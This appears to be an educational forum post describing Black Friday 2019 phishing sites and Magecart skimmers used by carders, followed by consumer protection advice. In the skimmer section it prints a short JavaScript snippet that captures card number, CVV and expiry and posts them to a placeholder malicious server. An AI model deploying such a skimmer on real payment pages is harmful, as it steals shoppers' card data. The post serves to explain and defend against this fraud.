An example of a case where carders used fake websites to collect bank card data during sales

[Student]

Hello! For educational purposes, I'll be detailing a case study of carders using fake websites to harvest credit card data during sales. I'll also explain how these schemes work, the technologies used, the consequences, and how to protect yourself. I'll be describing a real-life case from the 2019 Black Friday sales, supplementing it with technical details and context based on reports from cybersecurity companies like Kaspersky, Trend Micro, and others.

Context: Why are sales the perfect time for carders?​

Sales such as Black Friday, Cyber Monday, and New Year's discounts create ideal conditions for cybercriminals:

• High Demand: Shoppers are actively looking for discounts, making them less attentive to details like website URLs or suspicious emails.
• Emotional factor: Time-limited offers create a sense of urgency, which reduces alertness.
• Massive traffic: Online stores experience peak loads, making it difficult to detect vulnerabilities or attacks in a timely manner.

Carders (cybercriminals who specialize in stealing bank card data) exploit these factors by creating fake websites or injecting malicious scripts into legitimate platforms.

Example: Phishing Sites During Black Friday 2019​

In 2019, according to Kaspersky and Symantec, over 170 phishing websites were detected during Black Friday, designed to impersonate popular online retailers like Amazon, Walmart, Target, and eBay. These websites were used to harvest credit card details, as well as other personal information (addresses, phone numbers, email addresses). Here's how it happened:

1. Preparing attacks​

• Creating Fake Websites: Attackers registered domains that looked almost identical to the original ones, such as:
  • amazon-discounts.com instead of amazon.com
  • walmart-offers.net instead of walmart.com
  • bestbuy-deals.online instead of bestbuy.com Typosquatting techniques were used, where domains contained minor spelling errors that were difficult to notice (for example, amaz0n.com with a zero instead of the letter "o").
• Design Copying: Fake websites were created using templates copied from the original sites. Carders used web scraping tools or ready-made CMS (such as WordPress with stolen themes) to quickly deploy the sites.
• SSL Certificates: To increase trust, many fake websites used free SSL certificates (such as those from Let's Encrypt), which would cause a lock icon to appear in the browser, creating the illusion of security.

2. Link distribution​

Carders actively used several channels to attract victims:

• Phishing emails: Emails were sent with subject lines like "Black Friday: Up to 80% off!" or "Exclusive offer today only!" The emails contained links to fake websites. To enhance credibility, fake sender addresses were used, imitating official store email addresses (e.g., deals@amazon-promo.com).
• Social media: Twitter (now X), Facebook, and Instagram were the sites where posts featuring fake promotions were published, often from hacked or specially created accounts.
• SMS mailings: Victims received text messages with short links (for example, through services like bit.ly) leading to phishing sites.
• Contextual advertising: Carders bought ads on Google Ads or social media using Black Friday-related keywords to get their fake websites to appear at the top of search results.

3. Data collection​

• Fake payment methods: The fake websites asked users to enter their card details (number, expiration date, CVV code) to purchase goods at "incredible discounts." After entering the details, they were sent to the scammers' servers.
• Skimmers on legitimate websites: In some cases, carders didn't create fake websites, but hacked vulnerable online stores by injecting malicious JavaScript scripts (such as Magecart ). These scripts intercepted data entered into payment forms and sent it to remote servers. In 2019, the Magecart group attacked hundreds of small online stores using outdated versions of Magento or WooCommerce.
• Additional data: In addition to maps, the sites collected emails, passwords, shipping addresses, and phone numbers, which were then used for further attacks (such as spear phishing).

4. Monetization​

• Direct transactions: Stolen card data was used to purchase high-value items (such as electronics), which were then resold.
• Darknet sales: These cards were sold on underground forums (such as Joker's Stash) for between $5 and $100 per card, depending on the limit and region.
• Cryptocurrency schemes: The attackers converted the stolen funds into cryptocurrency through exchangers to make it more difficult to track.

Technical details of the attacks​

Phishing sites​

• Technologies: The fake websites were built using HTML, CSS, and JavaScript, often using frameworks like Bootstrap to quickly replicate the design. Servers were hosted on cheap hosting services or compromised cloud platforms (such as AWS or Azure).
• Dynamic forms: Some sites used dynamic forms that checked the validity of entered data (for example, checking the card number checksum using the Luhn algorithm) to filter out random errors and improve the quality of the collected data.
• Obfuscation: To bypass security systems, JavaScript code on websites was obfuscated (made confusing) so that antiviruses and scanners could not recognize it.

Skimmers (Magecart)​

• How it worked: Skimmers were introduced through vulnerabilities in the content management system (CMS) (e.g., SQL injections or XSS attacks). The script was added to the payment page code and intercepted data entered into the form fields, sending it to the C2 (command-and-control) server.
• Example of skimmer code (simplified):
  

  document.getElementById('payment-form').addEventListener('submit', function(e) {
  const cardData = {
  number: document.getElementById('card-number').value,
  cvv: document.getElementById('cvv').value,
  expiry: document.getElementById('expiry').value
  };
  fetch('https://malicious-server.com/collect', {
  method: 'POST',
  body: JSON.stringify(cardData)
  });
  });

• Bypassing protection: Skimmers disguised themselves as legitimate analytics services (such as Google Analytics) to avoid suspicion.

Infrastructure​

• C2 servers: Data was sent to servers located in countries with low levels of cyber surveillance (such as Eastern Europe or Southeast Asia).
• Encryption: HTTPS and encrypted communication channels were used to protect data from interception.
• Automation Bots: Carders used bots to mass register domains, send emails, and test stolen cards.

Consequences​

1. For users:
   • Financial losses: Victims lost money due to unauthorized transactions. In some cases, banks returned the funds, but the process took weeks.
   • Personal data leak: Passwords and emails were used for further attacks such as account hacking.
   • Emotional stress: Shoppers hoping for discounts experienced deception and loss of trust in online shopping.
2. For business:
   • Reputational damage: Even if the attack occurred on a fake website, users blamed the original brand.
   • Financial losses: Companies spent millions investigating incidents, upgrading security systems, and compensating customers.
   • Legal implications: In some countries (such as the EU), companies that have suffered data breaches due to vulnerabilities have faced fines under the GDPR.
3. For the economy:
   • According to IBM Security, the average cost of a data breach for companies in 2019 was approximately $3.9 million.
   • The market for stolen data on the dark web was valued at billions of dollars annually.

How to protect yourself (educational recommendations)​

1. Website check:
   • Check URLs carefully: avoid sites with suspicious domains or extra characters.
   • Use services like VirusTotal or Google Safe Browsing to check a website's safety before entering data.
   • Pay attention to the quality of the website: spelling errors, low-quality images, or a lack of contact information are signs of phishing.
2. Payment security:
   • Use virtual cards with limited limits for online purchases.
   • Enable two-factor authentication (2FA) for bank accounts.
   • Check if the site supports 3D-Secure (an additional level of protection for cards).
3. Anti-phishing:
   • Don't click links in emails or messages. Instead, manually enter the website address into your browser.
   • Use antivirus software with anti-phishing protection (e.g. Kaspersky, Norton).
   • Set up spam filters in your email to block suspicious emails.
4. Technical measures:
   • Update your browsers and plugins to minimize vulnerabilities.
   • Use script blockers (such as uBlock Origin) to prevent skimmers from running.
   • Check HTTPS certificates: Fake sites may use free certificates, but their issuer (such as Let's Encrypt) does not guarantee their legitimacy.
5. Training:
   • Learn the basics of cybersecurity: Understanding how phishing and skimmers work helps you recognize threats.
   • Follow cyberattack news to stay informed about new schemes.

Real numbers and statistics​

• Kaspersky reported that in 2019, the number of phishing attacks during Black Friday increased by 23% compared to 2018.
• Symantec identified more than 4,000 unique phishing-related domains in November 2019.
• Magecart attacked more than 570 online stores in 2019, according to reports from RiskIQ.
• The average price of a stolen card on the darknet in 2019 ranged from $10 (for low-limit cards) to $100 (for premium high-limit cards).

Conclusion​

The Black Friday 2019 phishing incident demonstrates how carders exploit psychological tricks, technical vulnerabilities, and mass hype to steal data. These attacks highlight the importance of cyber hygiene: checking URLs, using reliable antivirus software, and being careful when entering data. For businesses, this highlights the need to invest in security, including protection against skimmers and monitoring phishing domains.

If you'd like to delve deeper into a specific aspect (such as technical details of skimmers, code samples, or a case study), let me know, and I'll provide more information!